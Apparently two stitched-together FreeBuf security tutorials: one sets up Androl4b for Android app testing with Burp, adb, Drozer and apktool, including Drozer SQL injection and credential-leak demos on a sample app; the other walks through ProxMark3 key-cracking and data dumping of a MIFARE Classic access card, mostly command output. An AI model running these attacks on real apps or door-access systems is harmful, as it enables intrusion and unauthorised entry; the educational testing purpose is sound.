使用Androl4b进行安卓APP安全测试(Part 1)

作者:雪碧0xroot@漏洞盒子安全团队

文章首发地址:

http://www.freebuf.com/articles/terminal/110374.html

0x00 前言

移动客户端Ap测试中,相信有很多小伙伴都是在自己常用的手机中安装上需要测试的App。这种方法是比较常见的一种,但是常用的手机中难免会有其它不相关的App在后台运行、进行网络请求,导致我们拦截到很多测试中不需要要的数据包甚至有的情况下我们无法辨别数据包是否是需要测试的App发出的请求。介于这种情况我们需要一个更干净的测试环境来对移动端App进行测试。

0x01工欲善其事必先利其器

Androl4b是一个基于ubuntu mate的安卓安全评估&测试的系统,系统集成了一系列Android 应用程序评估测试所需的工具,可用于逆向工程和恶意软件分析,为安卓测试、安全研究从业人员节省了大量环境搭建配置所需的时间、精力。

Clipboard Image.png

Clipboard Image.png

该工具的中文介绍可参阅:工具推荐:Androl4b,安卓安全评估测试利器  一文。

下载链接:http://pan.baidu.com/s/1dEfkwLV 密码:57gu

MD5Sum : 0c2346b1dbd769e3eb2069026a3c8efe
SHA1Sum : 1119e5e225094191739281670e2aa6400a15f80f

0x02 系统优化

下载解压完成后,可在虚拟机中直接启动Androl4b:

账户:andro

密码:androlab

Clipboard Image.png

使用过程中发现系统中已经集成JDK环境、Android Studio、Pyhton、Wireshark、BurpSuite等常用工具,由于工具是老外打包的,所以系统里边没安装中文语言。

2.1 设置DNS

System->Control Center->Network->DNS:

Clipboard Image.png

sudo apt-get update

2.2 安装中文语言包

System->Control Center->Language Support->Install/Remove Languages->Chines (simplified)

Clipboard Image.png

Apply Changes使配置生效,账户输入密码后便开始下载语言文件:

Clipboard Image.png

下载完成后把Chines拖到第一项(位于English前一位),把中文作为系统语言首选项。重启系统后,配置生效。也可以通过下面的步骤修改系统配置文件把中文作为首选项:

2.3 修改系统语言配置文件

修改local文件:

sudo vim /var/lib/locales/supported.d/local
//删除所有内容,增加以下内容:
zh_CN.UTF-8 UTF-8
zh_CN GB2312
zh_CN.GBK GBK
en_US.UTF-8 UTF-8
fr_FR ISO-8859-1
zh_CN.GB18030 GB18030

生成相关的locales:

sudo locale-gen --purge

修改设置默认语言:

sudo vim /etc/default/locale
//删除所有内容,增加以下内容:
LANG="zh_CN.UTF-8"
LANGUAGE="zh_CN:zh"
LC_NUMERIC="zh_CN.UTF-8"
LC_TIME="zh_CN.UTF-8"
LC_MONETARY="zh_CN.UTF-8"
LC_PAPER="zh_CN.UTF-8"
LC_IDENTIFICATION="zh_CN.UTF-8"
LC_NAME="zh_CN.UTF-8"
LC_ADDRESS="zh_CN.UTF-8"
LC_TELEPHONE="zh_CN.UTF-8"
LC_MEASUREMENT="zh_CN.UTF-8"

修改完成后重启系统,最终效果:

Clipboard Image.png

0x03 安卓虚拟机

Emulator安卓模拟器是目前使用最方便的安卓模拟器,无需安装任何插件,下载安装后直接点击运行。支持windows、Linux系统。Androl4B中已经安装了该工具,并且有一个名为lab的虚拟安卓设备:

Clipboard Image.png

3.1 为虚拟设备设置代理

终端执行

emulator -avd lab -no-audio -http-proxy http://127.0.0.1:8090

3.2 配置Burp Suite

3.2.1 增加代理

Applications->tools->BurpSuite  Proxy->Option-add->Bind to port 8090

Clipboard Image.png

3.2.2 监听127.0.0.1:8090

Clipboard Image.png

使用系统自带浏览器打开一个网站,测试能否拦截到网络请求:

Clipboard Image.png

Burp Suit成功拦截到了安卓虚拟机中的网络请求。

0x04 ADB的一些使用

4.1 显示系统中的全部安卓平台

android list targets

Clipboard Image.png

4.2 列出电脑连接的设备

adb devices

Clipboard Image.png

emulator-5554设备为emulator模拟器模拟的安卓手机,LGD857是我连接到电脑中的手机。

4.3 安装应用程序

adb install xxx.apk

Clipboard Image.png

4.3.1 拦截App通信数据包:

Clipboard Image.png

4.4 获取模拟器中的文件:

adb pull  

4.5 向模拟器中写文件:

adb push  

4.6 进入模拟器的shell模式:

adb shell

Clipboard Image.png

4.7 卸载模拟器中的App

adb uninstall com.sina.weibo

0x05 Drozer

Clipboard Image.png

5.1 工具介绍

Drozer原名mercury,是一款Android安全审计与攻击框架,该工具分为免费版(社区版)和专业版,专业版增加了GUI界面这类的一些功能。

5.2 工具站点

工具介绍下载地址:https://labs.mwrinfosecurity.com/tools/drozer/

工具GayHub开源项目地址:https://github.com/mwrlabs/drozer/

5.3 工具安装

Androl4b中已有这个工具,我们在终端执行、查看一下帮助信息:

andro@l4b:~$ drozer
usage: drozer [COMMAND]

Run `drozer [COMMAND] --help` for more usage information.

Commands:
          console  start the drozer Console
           module  manage drozer modules
           server  start a drozer Server
              ssl  manage drozer SSL key material
          exploit  generate an exploit to deploy drozer
            agent  create custom drozer Agents
          payload  generate payloads to deploy drozer
andro@l4b:~$ drozer console --help
usage: drozer console [OPTIONS] COMMAND

Starts a new drozer Console to interact with an Agent.

The drozer Console connects to an Agent and allows you to interact with the
system from the context of the agent application on the device. The console
can connect directly to an agent, if its embedded server is enabled, or through
a drozer Server that the agent is connected to.

positional arguments:
  command               the command to execute
  device                the unique identifier of the Agent to connect to

optional arguments:
  -h, --help            show this help message and exit
  --server HOST[:PORT]  specify the address and port of the drozer server
  --ssl                 connect with SSL
  --accept-certificate  accept any SSL certificate with a valid trust chain
  --debug               enable debug mode
  --no-color            disable syntax highlighting in drozer output
  --password            the agent requires a password
  -c ONECMD, --command ONECMD
                        specify a single command to run in the session
  -f [FILE [FILE ...]], --file [FILE [FILE ...]]
                        source file

available commands:
  commands    shows a list of all console commands                              
  connect     starts a new session with a device                                
  devices     lists all devices bound to the drozer server                      
  disconnect  disconnects a drozer session                                      
  version     display the installed drozer version  

接下来我们需要在Emulator安装Drozer。

5.3.1 运行安卓模拟器(Terminal ①):

emulator -avd lab

5.3.2 下载Drozer APK文件(Terminal ②):

wget https://labs.mwrinfosecurity.com/system/assets/934/original/drozer-agent-2.3.4.apk

5.3.3 把Drozer安装到安卓模拟器中:

adb install drozer-agent-2.3.4.apk

Clipboard Image.png

5.4 开始使用

5.4.1 在安卓虚拟机中运行drozer Agent App,打开Embbdded Server:

Clipboard Image.png

5.4.2 使用 adb 进行端口转发,转发到 Drozer使用的端口 31415,并进入Drozer 控制台:

adb forward tcp:31415 tcp:31415
drozer console connect

Clipboard Image.png

run $module    执行Drozer功能模块
list       列出Drozer所有功能模块
dz> list
app.activity.forintent      Find activities that can handle the given intent    
app.activity.info           Gets information about exported activities.         
app.activity.start          Start an Activity                                   
app.broadcast.info          Get information about broadcast receivers           
app.broadcast.send          Send broadcast using an intent                      
app.broadcast.sniff         Register a broadcast receiver that can sniff        
                            particular intents                                  
app.package.attacksurface   Get attack surface of package                       
app.package.backup          Lists packages that use the backup API (returns true
                            on FLAG_ALLOW_BACKUP)                               
app.package.debuggable      Find debuggable packages                            
app.package.info            Get information about installed packages            
app.package.launchintent    Get launch intent of package                        
app.package.list            List Packages                                       
app.package.manifest        Get AndroidManifest.xml of package                  
app.package.native          Find Native libraries embedded in the application.  
app.package.shareduid       Look for packages with shared UIDs                  
app.provider.columns        List columns in content provider                    
app.provider.delete         Delete from a content provider                      
app.provider.download       Download a file from a content provider that        
                            supports files                                      
app.provider.finduri        Find referenced content URIs in a package           
app.provider.info           Get information about exported content providers    
app.provider.insert         Insert into a Content Provider                      
app.provider.query          Query a content provider                            
app.provider.read           Read from a content provider that supports files    
app.provider.update         Update a record in a content provider               
app.service.info            Get information about exported services             
app.service.send            Send a Message to a service, and display the reply  
app.service.start           Start Service                                       
app.service.stop            Stop Service                                        
auxiliary.webcontentresolver
                            Start a web service interface to content providers. 
exploit.jdwp.check          Open @jdwp-control and see which apps connect       
exploit.pilfer.general.apnprovider
                            Reads APN content provider                          
exploit.pilfer.general.settingsprovider
                            Reads Settings content provider                     
information.datetime        Print Date/Time                                     
information.deviceinfo      Get verbose device information                      
information.permissions     Get a list of all permissions used by packages on   
                            the device                                          
scanner.activity.browsable  Get all BROWSABLE activities that can be invoked    
                            from the web browser                                
scanner.misc.native         Find native components included in packages         
scanner.misc.readablefiles  Find world-readable files in the given folder       
scanner.misc.secretcodes    Search for secret codes that can be used from the   
                            dialer                                              
scanner.misc.sflagbinaries  Find suid/sgid binaries in the given folder (default
                            is /system).                                        
scanner.misc.writablefiles  Find world-writable files in the given folder       
scanner.provider.finduris   Search for content providers that can be queried    
                            from our context.                                   
scanner.provider.injection  Test content providers for SQL injection            
                            vulnerabilities.                                    
scanner.provider.sqltables  Find tables accessible through SQL injection        
                            vulnerabilities.                                    
scanner.provider.traversal  Test content providers for basic directory traversal
                            vulnerabilities.                                    
shell.exec                  Execute a single Linux command.                     
shell.send                  Send an ASH shell to a remote listener.             
shell.start                 Enter into an interactive Linux shell.              
tools.file.download         Download a File                                     
tools.file.md5sum           Get md5 Checksum of file                            
tools.file.size             Get size of file                                    
tools.file.upload           Upload a File                                       
tools.setup.busybox         Install Busybox.                                    
tools.setup.minimalsu       Prepare 'minimal-su' binary installation on the     
                            device. 
shell    进入Drozer Agent App的shell交互界面
 dz> shell
u0_a343@g3:/data/data/com.mwr.dz $ 

5.5 工具功能

5.5.1 列出模拟器设备中所有已经安装的App包列表

run app.package.list

Clipboard Image.png

5.5.2 列举APP的详细信息:

在文章第一部分我们安装了新浪微博,这里便以微博为例:

利用关键词“weibo”进行搜索得出包名:

dz> run app.package.list -f weibo
com.sina.weibo (微博)
dz> 

查看包信息:

run app.package.info -a  com.sina.weibo

Clipboard Image.png

通过上述方式,我们已经获得应用数据目录、apk的路径、UID、GID等信息。
5.5.3 APP攻击面分析&查找应用的IPS漏洞:

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
  139 activities exported
  21 broadcast receivers exported
  1 content providers exported
  16 services exported

微博中存在139个暴露的activity ,我们可以使用下面这条命令查看app的activity:

5.5.4 获取activity信息

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
  com.sina.weibo.MainTabActivity
    Permission: null
  com.sina.weibo.composerinde.ComposerDispatchActivity
    Permission: null
..................省略若干........................
  com.sina.weibo.richdocument.RichDocumentDispatchActivity
    Permission: null
  com.sina.weibo.notepro.NoteActivity
    Permission: null

dz>

5.5.5 Reading from Content Providers

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
  Authority: com.sina.weibo.sdkProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.sina.weibo.provider.SinaWeiboSdkProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

5.5.6 Database-backed Content Providers (Data Leakage)

由于在写文章测试的过程中,没有找到合适的App来演示数据泄露利用模块以及sql注入模块的功能,直接贴一下使用指南中的案例演示:

dz> run scanner.provider.finduris 
-
a com.mwr.example.sieve 
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.
example.sieve.DBContentProvider/
... 
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys 
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

利用

dz> run app.provider.query 
content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64
-
encoded)
email: incognitoguy50@gmail.com

5.5.7 Database-backed Content Providers (SQL Injection)

dz> run app.provider.query content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
projection "'" 
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

dz> run app.provider.query 
content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
selection "'" 
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords 
WHERE (')

Droer 使用指南

Drozer的更多功能、使用方法可参阅:Drozer 使用指南 : https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

0x06 ApkTool

6.1 工具介绍

Clipboard Image.png

ApkTool是谷歌提供的APK编译工具,支持反编译及回编译apk。同时安装反编译系统apk所需要的framework-res框架,清理上次反编译文件夹等功能。使用该工具需安装Java环境。

6.2 decode

decode命令用于进行反编译apk文件:

apktool decode xx.apk

Clipboard Image.png

反编译完成,我们可以看到一个”weibo”目录,目录中有一个AndroidManifest.xml文件:

Clipboard Image.png

通过分析AndroidManifest.xml,我们可以获取到这些信息:包名、版本信息、Activity组件等:

Clipboard Image.png

在标签当中我们可以找到所有的activity:

Clipboard Image.png

0x07 refer

https://blogs.mcafee.com/mcafee-labs/testing-android-application-security-part-1/

https://github.com/sh4hin/Androl4b

工具推荐:Androl4b,安卓安全评估测试利器

Drozer 使用指南 : https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

blogs.mcafee.com : How to: Testing Android Application Security, Part 2

maxwithcoco.com : drozer:某APK ContentProvider安全测试

*本文作者:雪碧0xroot@漏洞盒子安全团队,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

RFID Hacking ④:ProxMark3 破解门禁

pm3

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

0x00 前言

国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)

Clipboard Image.png

北上广不相信眼泪 16集

在这一背景下,我们不经思考:门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视?

0x01 准备工作

Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。

Clipboard Image.png

1.1 进入PM3工作终端

./proxmark3 /dev/ttyACM0

1.2 测试天线

proxmark3> hw tune

# LF antenna: 29.98 V @   125.00 kHz          
# LF antenna: 30.39 V @   134.00 kHz          
# LF optimal: 36.30 V @   129.03 kHz          
# HF antenna: 27.90 V @    13.56 MHz          
proxmark3> 

1.3 设备固件

proxmark3> hw ver
#db# Prox/RFID mark3 RFID instrument                 
#db# bootrom: /-suspect 2015-04-02 15:12:04                 
#db# os: /-suspect 2015-04-02 15:12:11                 
#db# HF FPGA image built on 2015/03/09 at 08:41:42    

0x02 爆破&枚举秘钥

2.1 读取卡片

proxmark3> hf 14a reader
ATQA : 04 00          
 UID : 2c f0 55 0b           
 SAK : 08 [2]          
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1          
proprietary non iso14443a-4 card found, RATS not supported 

2.2 执行NESTED攻击,枚举&爆破key:

proxmark3> hf mf chk *1 ? t
No key specified,try default keys          
chk default key[0] ffffffffffff          
chk default key[1] 000000000000          
chk default key[2] a0a1a2a3a4a5          
chk default key[3] b0b1b2b3b4b5          
chk default key[4] aabbccddeeff          
chk default key[5] 4d3a99c351dd          
chk default key[6] 1a982c7e459a          
chk default key[7] d3f7d3f7d3f7          
chk default key[8] 714c5c886e97          
chk default key[9] 587ee5f9350f          
chk default key[10] a0478cc39091          
chk default key[11] 533cb6c723f6          
chk default key[12] 8fd0a4f256e9          
--SectorsCnt:0 block no:0x03 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:1 block no:0x07 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:2 block no:0x0b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:3 block no:0x0f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:4 block no:0x13 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:5 block no:0x17 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:6 block no:0x1b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:7 block no:0x1f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:8 block no:0x23 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:9 block no:0x27 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:10 block no:0x2b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:11 block no:0x2f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:12 block no:0x33 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:13 block no:0x37 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:14 block no:0x3b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:15 block no:0x3f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:0 block no:0x03 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:1 block no:0x07 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:2 block no:0x0b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:3 block no:0x0f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:4 block no:0x13 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:5 block no:0x17 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:6 block no:0x1b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:7 block no:0x1f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:8 block no:0x23 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:9 block no:0x27 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:10 block no:0x2b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:11 block no:0x2f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:12 block no:0x33 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:13 block no:0x37 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:14 block no:0x3b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:15 block no:0x3f key type:B key count:13           
Found valid key:[ffffffffffff]          
proxmark3> 

成功获得卡片key。

2.3 利用PRNG漏洞,执行mifare “DarkSide”攻击

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average  :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(090a070d060b0501) nr(00000000)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000000| 9 |  c  |0,0,0,0,0,0,0,0|
| 20 |00000020| a |  f  |0,0,0,0,0,0,0,0|
| 40 |00000040| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000060| d |  8  |0,0,0,0,0,0,0,0|
| 80 |00000080| 6 |  3  |0,0,0,0,0,0,0,0|
| a0 |000000a0| b |  e  |0,0,0,0,0,0,0,0|
| c0 |000000c0| 5 |  0  |0,0,0,0,0,0,0,0|
| e0 |000000e0| 1 |  4  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8          
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d0407030d070c04) nr(00000001)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000001| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000021| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000041| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000061| 3 |  6  |0,0,0,0,0,0,0,0|
| 80 |00000081| d |  8  |0,0,0,0,0,0,0,0|
| a0 |000000a1| 7 |  2  |0,0,0,0,0,0,0,0|
| c0 |000000c1| c |  9  |0,0,0,0,0,0,0,0|
| e0 |000000e1| 4 |  1  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8          
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d040e0e0c010e00) nr(00000002)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000002| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000022| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000042| e |  b  |0,0,0,0,0,0,0,0|
| 60 |00000062| e |  b  |0,0,0,0,0,0,0,0|
| 80 |00000082| c |  9  |0,0,0,0,0,0,0,0|
| a0 |000000a2| 1 |  4  |0,0,0,0,0,0,0,0|
| c0 |000000c2| e |  b  |0,0,0,0,0,0,0,0|
| e0 |000000e2| 0 |  5  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
p1:0 p2:0 p3:0 key:ffffffffffff
p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9
p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea
p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de
p1:3de0e p2:24775 p3:4 key:968a7a09c714
p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed
p1:54f81 p2:32426 p3:6 key:6ecaf371a99d
p1:58b75 p2:34777 p3:7 key:6860b744915b
p1:616dd p2:3998a p3:8 key:59747d7fdf41
p1:63400 p2:3ab54 p3:9 key:56476bbef406
p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91
p1:6dc19 p2:40e78 p3:b key:44554ae362a1
p1:708f8 p2:42956 p3:c key:3f83eb143dd6
p1:7abf0 p2:48987 p3:d key:2e2b8565f96b
p1:7b298 p2:48d82 p3:e key:2d70e3e38553
p1:8420b p2:4e219 p3:f key:1e238b63e204
p1:8ce60 p2:53484 p3:10 key:0f4b7cb380a5
key_count:17
------------------------------------------------------------------
Key found:ffffffffffff 

Found valid key:ffffffffffff          
proxmark3> 

通过这一方式,同样可以获得卡片的key,不过很多时候还是要靠运气,因为不是所有的卡片都存在这种漏洞。如果不存在PRNG漏洞,我们则需要通过嗅探卡片和读卡器之间通信的数据包解出卡片的Key。

使用PM3进行中间人攻击嗅探通信数据包的方法可参考:【RFID Hacking③】ProxMark3使用案例:嗅探银行闪付卡信息 ,以及RadioWar团队的 利用Proxmark3监听M1卡交互过程,算出某一区的key

0x03 dump卡片数据&数据处理

使用上述方法,我们成功获得卡片key,接下来我们便可以使用key导出卡片中的所有数据(dumpdata)

proxmark3> hf mf nested 1 0 A ffffffffffff d 
--block no:00 key type:00 key:ff ff ff ff ff ff  etrans:0          
Block shift=0          
Testing known keys. Sector count=16          
nested...          
Time in nested: 0.030 (inf sec per key)

-----------------------------------------------
Iterations count: 0

|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...          
proxmark3> 

在这一过程中,在PM3当前工作目录下生成了dumpkey.bin文件:

Clipboard Image.png

接下来我们执行hf mf dump便能获得整张卡片的数据:

proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
Command execute timeout          
Sending bytes to proxmark failed          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
proxmark3> 

此时,卡片数据已经被导出到PM3主目录下的dumpdata.bin这个二进制文件中,:

Clipboard Image.png

